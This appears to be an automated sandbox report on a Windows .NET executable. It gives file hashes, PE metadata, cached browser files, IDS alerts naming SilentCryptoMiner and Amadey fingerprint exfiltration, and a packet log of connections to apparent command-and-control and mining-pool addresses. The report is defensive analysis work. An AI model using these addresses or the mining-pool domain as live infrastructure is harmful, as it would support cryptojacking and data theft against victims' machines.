AAAAAAASaIA/br%3D1/rs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/ck%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBY..i"
Preview:	)]}'.21;["R1hbZ9m8AcmJ7NYPytGlUA","2131"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;

Chrome Cache Entry: 156

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (480)
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.310588221280986
Encrypted:	false
SSDEEP:	48:XrNaB3p7BEjTe7ucn0KgUYcvGbkpRGb9dKbm/:xSp7BE3eKPV5apCdL
MD5:	BC8FF2F7FBFC205AFCB6C0B9408EBF66
SHA1:	C1762D87F23FECB1DBCA33A04F10D7D3077FE2D7
SHA-256:	550E9D55DC9CC6EE9D94CFAD4E3030A956DB73A4695D9C6815645D95FFCB72C9
SHA-512:	15912EA8010227DA7BAAA62D887958E82490DEBF374A63970CE428B591651D7A6635C31B5D830F2594FB7E7B39856166BB3F27F17B44B7FD20E4EF44625EBD57
Malicious:	false
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.y("lOO0Vd");._.lmb=new _.Zd(_.UPa);._.z();.}catch(e){_._DumpException(e)}.try{.var smb;_.tmb=function(a,b,c,d,e){this.cua=a;this.POc=b;this.U5a=c;this.aTc=d;this.K1c=e;this.hZa=0;this.T5a=smb(this)};smb=function(a){return Math.random()Math.min(a.POcMath.pow(a.U5a,a.hZa),a.aTc)};_.tmb.prototype.QHb=function(){return this.hZa};_.tmb.prototype.Mba=function(a){return this.hZa>=this.cua?!1:a!=null?!!this.K1c[a]:!0};_.umb=function(a){if(!a.Mba())throw Error("qf`"+a.cua);++a.hZa;a.T5a=smb(a)};.}catch(e){_._DumpException(e)}.try{._.y("P6sQOc");.var vmb=function(a){var b={};_.Qa(a.Yab(),function(e){b[e]=!0});var c=a.gab(),d=a.rab();return new _.tmb(a.qab(),_.vd(c,1)1E3,a.v$a(),_.vd(d,1)1E3,b)},wmb=!!(_.Bh[27]>>28&1);var xmb=function(){this.ka=_.de(_.nmb);this.wa=_.de(_.lmb);this.Zb=null;var a=_.de(_.Zhb);this.fetch=a.fetch.bind(a)};xmb.prototype.oa=function(a,b){if(this.wa.getType(a.nj())!==1)return _.dib(a);var c=this.ka.policy;(c=

Chrome Cache Entry: 157

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
Category:	downloaded
Size (bytes):	15344
Entropy (8bit):	7.984625225844861
Encrypted:	false
SSDEEP:	384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
MD5:	5D4AEB4E5F5EF754E307D7FFAEF688BD
SHA1:	06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
SHA-256:	3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
SHA-512:	7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
Malicious:	false
URL:	https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h\|.l....A....b6........(......@e.]...:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P\|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].\|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)\|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed..'..qP....M..j....../.z&.=...q<....-..?.A.%..K..

Chrome Cache Entry: 158

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (32931)
Category:	downloaded
Size (bytes):	49455
Entropy (8bit):	5.797174428997135
Encrypted:	false
SSDEEP:	768:/YEyhBRvpu7Uqt51OH7k453wnpJGTCYVQFMVq92hvhiyydcceZO5d75OPOq1t2eT:51Obt5AnpJ4LVj8d1OT2e27ax/13WVxy
MD5:	8C7207DF2BB41FE068B940DC7DF9CAE2
SHA1:	4DF23C1D36438E4E1C03AAFE9A2F6EBA0C83D1B3
SHA-256:	8570D2EC74BEEE5119C0AE70B79E173CD18C5ABA20C8537E48EC1F2D252E4096
SHA-512:	33817CAC1FEB6C5DAE32F9010A7C3C863950ED04588E0DFC35654895E16B69FF20FEFAAFE4B38805053D08929E3B54D5F760D790CC82F5B56B568212154B9983
Malicious:	false
URL:	https://ogs.google.com/widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en
Preview:	<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="preconnect" href="https://www.gstatic.com"><link rel="preconnect" href="https://ssl.gstatic.com"><script data-id="_gd" nonce="VVrrrrAp2-IwQ0be_sfKNQ">window.WIZ_global_data = {"DpimGf":false,"EP1ykd":["/_/*"],"FdrFJe":"337555105330298737","Im6cmf":"/_/OneGoogleWidgetUi","LVIXXb":1,"LoQv7e":true,"MT7f9b":[],"MUE6Ne":"OneGoogleWidgetUi","NrSucd":false,"OwAJ6e":false,"QrtxK":"","Rf2tsb":0,"S06Grb":"","S6lZl":128566913,"TSDtV":"%.@.[[null,[[45459555,null,false,null,null,null,\"Imeoqb\"]],\"CAMSEx0W99WlEMaAmxAImKUGCLWcDQg\\u003d\"]]]","UUFaWc":"%.@.null,1000,2]","Vvafkd":false,"Yllh3e":"%.@.1734039629493691,122277773,269592087]","ZwjLXe":538,"cfb2h":"boq_onegooglehttpserver_20241209.08_p0","eptZe":"/_/OneGoogleWidgetUi/","fPDxwd":[48802160,974963

Chrome Cache Entry: 159

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3444)
Category:	downloaded
Size (bytes):	21245
Entropy (8bit):	5.411248120437403
Encrypted:	false
SSDEEP:	384:9jYR4O3ZcgRIoIXwf6F2mtOdBrutT211bVMpOfCP2K7N09m6Juw+6x51m:9jYRnEFgf6omtkKtqripOq+KW9VJuw+7
MD5:	12ACB85911FADCB8CCCCFC5CDCD3605E
SHA1:	87CAE96D0442721C51FB34AD73188F91F8B03D84
SHA-256:	9A6121461FFEF036265172EC697AE35DB0E5B49745174B990FA69028A629EA9E
SHA-512:	3D025B61D6A96210B643EDC1B42F0554FD88199A48E0AE6BA3C20D352AECF58A79E03605141108F3D2F9C82A5D5930DAE23B74ED1975D2169E1536EC46813FE8
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.TMRuql7m9IQ.es5.O/ck=boq-one-google.OneGoogleWidgetUi.PhiAK5ucTOM.L.B1.O/am=gDAYcBs/d=1/exm=A7fCU,BVgquf,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,XVMNvd,Z5uLle,ZDZcre,ZwDk9d,_b,_tp,aW3pY,byfTOb,e5qFLc,gychg,hKSk3e,hc6Ubd,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHugDNIKJ7Ut_tly-SR7xrDljQj4rA/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=p3hmRc,LvGhrf,RqjULd"
Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{.var eG;._.gG=function(){var a=eG(_.Ge("xwAfE"),function(){return _.Ge("UUFaWc")}),b=eG(_.Ge("xnI9P"),function(){return _.Ge("u4g7r")}),c,d,e,f;return(f=fG)!=null?f:fG=Object.freeze({isEnabled:function(g){return g===-1\|\|_.Ff(_.Ge("iCzhFc"),!1)?!1:a.enabled\|\|b.enabled},Fg:(c=_.Fm(_.Ge("y2FhP")))!=null?c:void 0,Er:(d=_.Fm(_.Ge("MUE6Ne")))!=null?d:void 0,zg:(e=_.Fm(_.Ge("cfb2h")))!=null?e:void 0,Bf:_.Hm(_.Ge("yFnxrf"),-1),Gw:_.Lm(_.Ge("fPDxwd")).map(function(g){return _.Hm(g,0)}).filter(function(g){return g>0}),.Tz:a,l9:b})};eG=function(a,b){a=_.Ff(a,!1);return{enabled:a,Zt:a?_.Vd(_.Im(b(),_.hG)):Mia()}};_.hG=function(a){this.va=_.x(a)};_.D(_.hG,_.B);var Mia=function(a){return function(){return _.yd(a)}}(_.hG);var fG;._.n("p3hmRc");.var Yia=function(a){a.v=!0;return a},Zia=function(a,b,c,d){this.transport=a;this.j=b;this.l=c;this.Fg=d;this.o=Number(Date.now()).toString(36)+Math

Chrome Cache Entry: 160

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	downloaded
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:	3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.987285457182454
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	file.exe
File size:	5'879'808 bytes
MD5:	60bc4894d78ba3f2ef9aa66486aad79e
SHA1:	255ea77a0b211d3a1296e908e2c5d3d10b048d1b
SHA256:	fbddc581f4b7288285aa44ae2f772b5606d7a0104b1e88169f9499229b7028c0
SHA512:	ff35e69f5fbf121aa3c981c983d2aae3640d252943e49c4a1bb1ff42383e153dd386bad4b3711713a2ad28108f3403d5f5227c12388ad64837011e2b83f5a099
SSDEEP:	98304:vWTonxCNn6gLXEg4/x4W9lLgHegHULFVH7gYhWhrnYHp:uTYsLX8x9N4egO37g5hrn
TLSH:	6A46334A33970AA5F3F6DA3EC0E269541B74B992D70FC3041FA425E908B27869D5BF13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...{.[g..........".......Y.............. ....@...... ........................Z...........`...@......@............... .....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675B807B [Fri Dec 13 00:31:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x59e000	0x56e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x59ae4c	0x59b000	4a212081c21d212bc58cc3079b2c2063	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x59e000	0x56e	0x600	0477df6b89b481ddd804509c071eadcb	False	0.4192708333333333	data	4.020017035155992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x59e05c	0x2ec	data			0.44385026737967914
RT_MANIFEST	0x59e384	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-12T22:40:10.560363+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.5	55329	1.1.1.1	53	UDP
2024-12-12T22:40:14.631621+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	154.216.20.243	443	192.168.2.5	49709	TCP
2024-12-12T22:40:16.888945+0100	2044697	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3	1	192.168.2.5	49713	154.216.20.243	443	TCP
2024-12-12T22:41:15.706336+0100	2051004	ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request	2	192.168.2.5	49914	154.216.20.243	443	TCP
2024-12-12T22:41:15.706920+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	154.216.20.243	443	192.168.2.5	49914	TCP
2024-12-12T22:42:16.529926+0100	2051004	ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request	2	192.168.2.5	50034	154.216.20.243	443	TCP
2024-12-12T22:42:16.530195+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	154.216.20.243	443	192.168.2.5	50034	TCP
2024-12-12T22:43:16.377226+0100	2051004	ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request	2	192.168.2.5	50115	154.216.20.243	443	TCP
2024-12-12T22:43:16.377468+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	154.216.20.243	443	192.168.2.5	50115	TCP
2024-12-12T22:44:17.341589+0100	2051004	ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request	2	192.168.2.5	50120	154.216.20.243	443	TCP
2024-12-12T22:44:17.341795+0100	2054247	ET MALWARE SilentCryptoMiner Agent Config Inbound	1	154.216.20.243	443	192.168.2.5	50120	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 22:39:53.963910103 CET	49674	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:39:53.963916063 CET	49675	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:39:54.073276997 CET	49673	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:40:03.573220968 CET	49674	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:40:03.573221922 CET	49675	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:40:03.682517052 CET	49673	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:40:06.092674017 CET	443	49703	23.1.237.91	192.168.2.5
Dec 12, 2024 22:40:06.092786074 CET	49703	443	192.168.2.5	23.1.237.91
Dec 12, 2024 22:40:10.827008009 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:10.946923018 CET	3333	49704	37.203.243.102	192.168.2.5
Dec 12, 2024 22:40:10.947168112 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:10.947468042 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:11.067497015 CET	3333	49704	37.203.243.102	192.168.2.5
Dec 12, 2024 22:40:12.276526928 CET	3333	49704	37.203.243.102	192.168.2.5
Dec 12, 2024 22:40:12.276567936 CET	3333	49704	37.203.243.102	192.168.2.5
Dec 12, 2024 22:40:12.276807070 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:12.624937057 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:12.624984026 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:12.625108004 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:12.639465094 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:12.639487028 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.077311993 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.079016924 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.079037905 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.080348969 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.080739021 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.083019972 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.083101034 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.083553076 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.083565950 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.161729097 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.631459951 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.631536007 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.632977009 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.651045084 CET	49709	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.651081085 CET	443	49709	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.658905029 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:14.658905029 CET	49704	3333	192.168.2.5	37.203.243.102
Dec 12, 2024 22:40:14.778532028 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.778565884 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:14.778670073 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.791069984 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:14.791079998 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:15.185616970 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:15.185650110 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:15.185724974 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:15.185940027 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:15.185947895 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.328582048 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.330019951 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.330030918 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.331037998 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.331115007 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.333990097 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.334053040 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.334842920 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.334849119 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.474034071 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.888925076 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.888992071 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.889096975 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.892653942 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.893773079 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:16.893795013 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.896155119 CET	49713	443	192.168.2.5	154.216.20.243
Dec 12, 2024 22:40:16.896173000 CET	443	49713	154.216.20.243	192.168.2.5
Dec 12, 2024 22:40:16.897418976 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.897524118 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:16.911217928 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:16.911452055 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.911974907 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:16.911995888 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:16.968899965 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:17.069648981 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.088675022 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:17.088805914 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:17.089297056 CET	49718	4444	192.168.2.5	185.157.162.216
Dec 12, 2024 22:40:17.210846901 CET	4444	49718	185.157.162.216	192.168.2.5
Dec 12, 2024 22:40:17.790405035 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.790443897 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.790486097 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.790508986 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.790530920 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.790559053 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.798660040 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.798706055 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.798712969 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.798731089 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.798826933 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.798835039 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.870220900 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.910121918 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.920453072 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.920551062 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.920589924 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.924787998 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.924844980 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.924868107 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.973684072 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.986315012 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.991775036 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:17.991836071 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:17.991905928 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.001440048 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.001530886 CET	49715	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.001584053 CET	443	49715	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:18.012495041 CET	49722	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:18.012540102 CET	443	49722	142.250.181.132	192.168.2.5
